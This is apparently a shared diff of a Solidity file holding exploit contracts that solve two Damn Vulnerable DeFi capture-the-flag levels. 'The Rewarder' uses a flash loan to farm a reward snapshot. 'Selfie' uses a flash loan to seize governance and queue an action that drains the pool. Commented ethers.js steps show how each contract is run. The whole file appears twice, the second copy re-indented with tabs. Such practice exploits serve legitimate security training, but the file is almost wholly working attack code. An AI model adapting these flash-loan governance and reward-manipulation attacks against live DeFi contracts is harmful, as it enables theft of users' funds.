BedrosovaYulia · September 1, 2023 12:56
diff --git a/DVN.sol b/DVN.sol
 // The Rewarder
 // SPDX-License-Identifier: MIT

 pragma solidity ^0.8.0;

 import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
 import "@openzeppelin/contracts/utils/Address.sol";
 import "../DamnValuableToken.sol";

 interface ILendingPool{
    function flashLoan(uint256 amount) external;
 }

 interface IRewardPool{
    function deposit(uint256 amount) external;
    function withdraw(uint256 amount) external;
    function distributeRewards() external returns (uint256 rewards);
    function isNewRewardsRound() external view returns (bool);
 }

 contract RewarderAttaker {

    ILendingPool private immutable lpool;
    IRewardPool private immutable rpool;
    address private immutable attaker;

    DamnValuableToken private immutable ltoken;
    DamnValuableToken private immutable rtoken;

    constructor(address _lendingPool, address _rewardsPool, address _ltoken, address _rtoken){
        lpool = ILendingPool(_lendingPool);
        rpool = IRewardPool(_rewardsPool);
        attaker = msg.sender;
        ltoken = DamnValuableToken(_ltoken);
        rtoken = DamnValuableToken(_rtoken);
    }

    function attak() external{
       
        lpool.flashLoan(ltoken.balanceOf(address(lpool)));
        

    }

    function receiveFlashLoan(uint256 amount) external{

        uint256 balance = ltoken.balanceOf(address(this));
        ltoken.approve(address(rpool), balance);
        rpool.deposit(balance);
        rpool.withdraw(balance);
        balance = ltoken.balanceOf(address(this));
        rtoken.transfer(attaker, rtoken.balanceOf(address(this)));
        ltoken.transfer(address(lpool), balance);
    }

 }

 /*
        // Advance time 5 days so that depositors can get rewards
        await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days
        attaker = await (await ethers.getContractFactory('RewarderAttaker', player)).deploy(
            flashLoanPool.address,
            rewarderPool.address,
            liquidityToken.address,
            rewardToken.address);
        await attaker.connect(player).attak();
 */

 //Selfie
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;

 import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
 import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol";
 import "@openzeppelin/contracts/interfaces/IERC3156FlashLender.sol";
 import "@openzeppelin/contracts/interfaces/IERC3156FlashBorrower.sol";
 import "../DamnValuableTokenSnapshot.sol";
 import "./SimpleGovernance.sol";

 interface IPool{
    function flashLoan(IERC3156FlashBorrower _receiver, address _token, uint256 _amount, bytes calldata _data) external returns (bool);
 }

 contract SelfieAttaker is IERC3156FlashBorrower{

    IPool public immutable pool;
    ISimpleGovernance public immutable gover;
    DamnValuableTokenSnapshot public immutable DVTtoken;

    address private attaker;
    uint256 public aid;

    constructor(address _pool, address _gover, address _token){
        pool = IPool(_pool);
        gover = ISimpleGovernance(_gover);
        DVTtoken = DamnValuableTokenSnapshot(_token);
        attaker = msg.sender;
    }

    function attak() external{
        pool.flashLoan(this, address(DVTtoken), DVTtoken.balanceOf(address(pool)), "0x1");
    }

    function onFlashLoan(
        address initiator,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) external returns (bytes32){

        DVTtoken.snapshot();

        bytes memory data2 = abi.encodeWithSignature(
            "emergencyExit(address)",  
            attaker);
        aid = gover.queueAction(address(pool),0,data2);
        
        DVTtoken.approve(address(pool), DVTtoken.balanceOf(address(this)));

        return keccak256("ERC3156FlashBorrower.onFlashLoan");

    }

 }

 /*        attaker = await (await ethers.getContractFactory('SelfieAttaker', player)).deploy(pool.address,governance.address,token.address);
        await attaker.connect(player).attak();
        await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]); // 1 days
        await governance.connect(player).executeAction(attaker.aid());*/
	// The Rewarder
	// SPDX-License-Identifier: MIT

	pragma solidity ^0.8.0;

	import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
	import "@openzeppelin/contracts/utils/Address.sol";
	import "../DamnValuableToken.sol";

	interface ILendingPool{
	function flashLoan(uint256 amount) external;
	}

	interface IRewardPool{
	function deposit(uint256 amount) external;
	function withdraw(uint256 amount) external;
	function distributeRewards() external returns (uint256 rewards);
	function isNewRewardsRound() external view returns (bool);
	}

	contract RewarderAttaker {

	ILendingPool private immutable lpool;
	IRewardPool private immutable rpool;
	address private immutable attaker;

	DamnValuableToken private immutable ltoken;
	DamnValuableToken private immutable rtoken;

	constructor(address _lendingPool, address _rewardsPool, address _ltoken, address _rtoken){
	lpool = ILendingPool(_lendingPool);
	rpool = IRewardPool(_rewardsPool);
	attaker = msg.sender;
	ltoken = DamnValuableToken(_ltoken);
	rtoken = DamnValuableToken(_rtoken);
	}

	function attak() external{

	lpool.flashLoan(ltoken.balanceOf(address(lpool)));


	}

	function receiveFlashLoan(uint256 amount) external{

	uint256 balance = ltoken.balanceOf(address(this));
	ltoken.approve(address(rpool), balance);
	rpool.deposit(balance);
	rpool.withdraw(balance);
	balance = ltoken.balanceOf(address(this));
	rtoken.transfer(attaker, rtoken.balanceOf(address(this)));
	ltoken.transfer(address(lpool), balance);
	}

	}

	/*
	// Advance time 5 days so that depositors can get rewards
	await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days
	attaker = await (await ethers.getContractFactory('RewarderAttaker', player)).deploy(
	flashLoanPool.address,
	rewarderPool.address,
	liquidityToken.address,
	rewardToken.address);
	await attaker.connect(player).attak();
	*/

	//Selfie
	// SPDX-License-Identifier: MIT
	pragma solidity ^0.8.0;

	import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
	import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol";
	import "@openzeppelin/contracts/interfaces/IERC3156FlashLender.sol";
	import "@openzeppelin/contracts/interfaces/IERC3156FlashBorrower.sol";
	import "../DamnValuableTokenSnapshot.sol";
	import "./SimpleGovernance.sol";

	interface IPool{
	function flashLoan(IERC3156FlashBorrower _receiver, address _token, uint256 _amount, bytes calldata _data) external returns (bool);
	}

	contract SelfieAttaker is IERC3156FlashBorrower{

	IPool public immutable pool;
	ISimpleGovernance public immutable gover;
	DamnValuableTokenSnapshot public immutable DVTtoken;

	address private attaker;
	uint256 public aid;

	constructor(address _pool, address _gover, address _token){
	pool = IPool(_pool);
	gover = ISimpleGovernance(_gover);
	DVTtoken = DamnValuableTokenSnapshot(_token);
	attaker = msg.sender;
	}

	function attak() external{
	pool.flashLoan(this, address(DVTtoken), DVTtoken.balanceOf(address(pool)), "0x1");
	}

	function onFlashLoan(
	address initiator,
	address token,
	uint256 amount,
	uint256 fee,
	bytes calldata data
	) external returns (bytes32){

	DVTtoken.snapshot();

	bytes memory data2 = abi.encodeWithSignature(
	"emergencyExit(address)",
	attaker);
	aid = gover.queueAction(address(pool),0,data2);

	DVTtoken.approve(address(pool), DVTtoken.balanceOf(address(this)));

	return keccak256("ERC3156FlashBorrower.onFlashLoan");

	}

	}

	/* attaker = await (await ethers.getContractFactory('SelfieAttaker', player)).deploy(pool.address,governance.address,token.address);
	await attaker.connect(player).attak();
	await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]); // 1 days
	await governance.connect(player).executeAction(attaker.aid());*/